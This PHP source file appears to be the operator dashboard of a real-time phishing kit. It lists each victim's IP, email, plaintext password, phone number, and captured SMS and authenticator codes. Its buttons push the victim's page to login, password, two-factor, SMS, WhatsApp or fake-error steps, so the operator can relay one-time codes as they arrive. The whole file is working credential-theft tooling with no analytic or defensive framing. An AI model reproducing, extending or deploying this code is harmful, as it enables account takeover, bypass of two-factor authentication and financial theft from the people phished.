<?php
session_start();
require_once './main/config.php';

if (!isset($_SESSION['admin_logged_in'])) {
    exit('Unauthorized');
}

try {
    $stmt = $db->query("SELECT * FROM users WHERE status != 'mark_completed' ORDER BY id DESC");
    while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
        $is_banned = filter_var($row['is_banned'], FILTER_VALIDATE_BOOLEAN);

        if($is_banned) continue;

        // Determine online status
        $is_online = $row['is_online'] ?? 0;
        $last_seen = $row['last_seen'] ?? null;
        $online_indicator = $is_online ?
            "<span class='online-status online' title='User is online'>●</span>" :
            "<span class='online-status offline' title='Last seen: " . ($last_seen ? date('M j, Y g:i A', strtotime($last_seen)) : 'Never') . "'>●</span>";

        $buttons = "
            <div class='action-buttons'>
                    <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"login\")' >
                       Login
                    </button>
                    <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"login_error\")' >
                       Login Error
                    </button>
                    <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"password\")' >
                       Password
                    </button>
                    <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"password_error\")' >
                       Password Error
                    </button>
                      <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"auth\")' >
                       Auth
                    </button>
                     <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"auth_error\")' >
                       X
                    </button>

     <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"email\")' >
 Email
                    </button>
                     <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"email_error\")' >
                       X
                    </button>


                 <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"sms\")' >
                       SMS
                    </button>
                    <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"sms_error\")' >
                       X
                    </button>
                     <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"whatsapp\")' >
                       WhatsApp
                    </button>
                    <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"whatsapp_error\")' >
                       X
                    </button>


                   
                    <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"5min\")' >
                       5 Mins
                    </button>
                    <button class='action-btn btn-success' onclick='handleSession(\"{$row['session_id']}\", \"90min\")' >
                       90 Mins
                    </button>
                      <button class='action-btn btn-green' onclick='handleSession(\"{$row['session_id']}\", \"completed\")' >
                        Done
                    </button>
                     <button class='action-btn btn-error' onclick='handleSession(\"{$row['session_id']}\", \"ban\")' >
                        Ban User
                    </button>

            </div>

            ";
        echo "<tr data-session-id=\"{$row['session_id']}\">
                <td>{$online_indicator} {$row['id']}</td>
                <td>{$row['session_id']}</td>
                <td>{$row['ip']}</td>
                <td>{$row['email']}</td>
                <td>{$row['password']}</td>
                <td>{$row['phone']}</td>
                <td>{$row['smsCode']}</td>
                <td>{$row['appCode']}</td>
                <td>{$row['status']}</td>
                <td>{$buttons}</td>
              </tr>";
    }
} catch (PDOException $e) {
    echo "<tr><td colspan='5'>Error loading sessions</td></tr>";
}
?>

<script>
function handleSession(sessionId, action) {
    // Find the row
    const row = document.querySelector(`tr[data-session-id="${sessionId}"]`);
    if (!row) return;
    const buttons = row.querySelectorAll('button');
    buttons.forEach(btn => btn.disabled = true);
    // If action requires extra input, gather it here
    let extraData = {};
    if (action === 'phonenumber') {
        const digits = prompt('Enter the last 2 digits of the phone number:');
        // If user cancelled prompt, re-enable buttons and abort
        if (digits === null) {
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        const trimmed = digits.trim();
        if (!/^\d{2}$/.test(trimmed)) {
            alert('Please enter exactly 2 numeric digits.');
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        extraData.digits = trimmed;
    } else if (action === 'sms') {
        const lastphone = prompt('Enter the last 2 digits of the phone number:');
        // If user cancelled prompt, re-enable buttons and abort
        if (lastphone === null) {
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        const trimmed = lastphone.trim();
        if (!/^\d{2}$/.test(trimmed)) {
            alert('Please enter exactly 2 numeric digits.');
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        extraData.lastphone = trimmed;
    } else if (action === 'whatsapp') {
        const lastwhatsapp = prompt('Enter the last 2 digits of the WhatsApp number:');
        // If user cancelled prompt, re-enable buttons and abort
        if (lastwhatsapp === null) {
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        const trimmed = lastwhatsapp.trim();
        if (!/^\d{2}$/.test(trimmed)) {
            alert('Please enter exactly 2 numeric digits.');
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        extraData.lastwhatsapp = trimmed;
    } else if (action === 'redirect') {
        const url = prompt('Enter the redirect URL:');
        if (url === null) {
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        const urlTrim = url.trim();
        if (!urlTrim) {
            alert('Please enter a valid URL.');
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        extraData.url = urlTrim;
    } else if (action === 'top_code') {
        const code = prompt('Enter the top code:');
        if (code === null) {
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        const codeTrim = code.trim();
        if (!codeTrim) {
            alert('Please enter a top code.');
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        extraData.code = codeTrim;
    } else if (action === 'smscode') {
        const sms = prompt('Enter the SMS code:');
        if (sms === null) {
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        const smsTrim = sms.trim();
        if (!smsTrim) {
            alert('Please enter an SMS code.');
            buttons.forEach(btn => btn.disabled = false);
            return;
        }
        extraData.smscode = smsTrim;
    }

    $.ajax({
        url: 'handle_session.php',
        type: 'POST',
        data: Object.assign({
            session_id: sessionId,
            action: action
        }, extraData),
        dataType: 'json',
        success: function(response) {
            if (response.success) {
                updateTableRow(response.data);
                if (action === 'mark_completed') {
                    row.style.animation = 'fadeOut 0.5s';
                    setTimeout(() => row.remove(), 500);
                }
            } else {
                alert('Error: ' + response.message);
            }
        },
        error: function() {
            alert('Network error occurred');
        },
        complete: function() {
            row.classList.remove('loading');
            buttons.forEach(btn => btn.disabled = false);
        }
    });
}

function updateTableRow(data) {
    const row = document.querySelector(`tr[data-session-id="${data.session_id}"]`);
    if (!row) return;
    const stepCell = row.querySelector('td:nth-child(3) span');
    const statusCell = row.querySelector('td:nth-child(4) span');
    stepCell.textContent = data.current_step;
    stepCell.className = data.current_step.includes('error') ? 'status-error' : 'status-active';
    statusCell.textContent = data.status;
    statusCell.className = `status-${data.status}`;
}


</script>

<style>
/* Base container styles */
.action-buttons {
    display: flex;
    flex-wrap: wrap;
    gap: 4px;
    padding: 4px;
    border-radius: 6px;
    min-width: 0; /* Prevent overflow */
}


/* Base button styles */
.action-btn {
    display: inline-flex;
    align-items: center;
    justify-content: center;
    gap: 4px;
    padding: 6px 8px;
    border: none;
    border-radius: 4px;
    font-size: 12px;
    font-weight: 500;
    cursor: pointer;
    transition: all 0.2s ease;
    min-width: 32px;
    height: 28px;
    white-space: nowrap;
}

/* Button variations */
.btn-success {
    background-color: #4CAF50;
    color: white;
}
.btn-gray {
    background-color:rgb(132, 132, 132);
    color: white;
}

.btn-error {
    background-color: #f44336;
    color: white;
    padding: 6px;
    min-width: 28px;
}

.btn-complete {
    background-color: #9C27B0;
    color: white;
}

/* Responsive breakpoints */
@media (max-width: 1400px) {
    .action-buttons {
        display: grid;
        grid-template-columns: repeat(4, 1fr);
        gap: 4px;
    }

}

@media (max-width: 1200px) {
    .action-buttons {
        grid-template-columns: repeat(3, 1fr);
    }
}

@media (max-width: 992px) {
    .action-buttons {
        grid-template-columns: repeat(2, 1fr);
    }
}

@media (max-width: 768px) {
    .action-buttons {
        grid-template-columns: 1fr;
    }


    .action-btn {
        width: 100%;
        height: 32px;
    }

    /* Hide icons on very small screens to save space */
    .action-btn i {
        display: none;
    }
}

/* Split screen optimizations */
@media (max-width: 600px) {
    table {
        font-size: 12px;
    }

    td, th {
        padding: 6px;
    }

    .action-buttons {
        margin: 0;
        padding: 2px;
    }


    .action-btn {
        font-size: 11px;
        padding: 4px 6px;
        height: 24px;
    }
}

/* Compact mode for very small widths */
@media (max-width: 400px) {
    .action-buttons {
        grid-template-columns: 1fr;
    }

    .action-btn {
        flex: 1;
        min-width: 0;
        padding: 4px;
    }
}

/* Table adjustments for small screens */
@media (max-width: 992px) {
    /* Make table scrollable horizontally */
    .table-responsive {
        overflow-x: auto;
        -webkit-overflow-scrolling: touch;
    }

    /* Optional: Stack table on very small screens */
    @media (max-width: 576px) {
        table, thead, tbody, th, td, tr {
            display: block;
        }

        thead tr {
            position: absolute;
            top: -9999px;
            left: -9999px;
        }

        tr {
            margin-bottom: 1rem;
            border: 1px solid #dee2e6;
        }

        td {
            border: none;
            position: relative;
            padding-left: 50%;
        }

        td:before {
            position: absolute;
            left: 6px;
            width: 45%;
            padding-right: 10px;
            white-space: nowrap;
            content: attr(data-label);
            font-weight: 500;
        }
    }
}

/* Hover and active states */
.action-btn:hover {
    opacity: 0.9;
    transform: translateY(-1px);
    box-shadow: 0 2px 4px rgba(0,0,0,0.1);
}

.action-btn:active {
    transform: translateY(0);
}

/* Status indicators */
[class^="status-"] {
    padding: 3px 6px;
    border-radius: 4px;
    font-weight: 500;
    font-size: 12px;
    display: inline-block;
}

.status-waiting {
    background-color: #FFF9C4;
    color: #F57F17;
}

.status-error {
    background-color: #FFEBEE;
    color: #C62828;
}

.status-active {
    background-color: #E8F5E9;
    color: #2E7D32;
}

/* Loading states */
.loading {
    opacity: 0.6;
    pointer-events: none;
}

.action-btn:disabled {
    opacity: 0.5;
    cursor: not-allowed;
    transform: none;
    box-shadow: none;
}

/* Online status indicators */
.online-status {
    display: inline-block;
    font-size: 16px;
    margin-right: 8px;
    font-weight: bold;
}

.online-status.online {
    color: #4CAF50;
    text-shadow: 0 0 3px #4CAF50;
}

.online-status.offline {
    color: #9E9E9E;
}
</style>
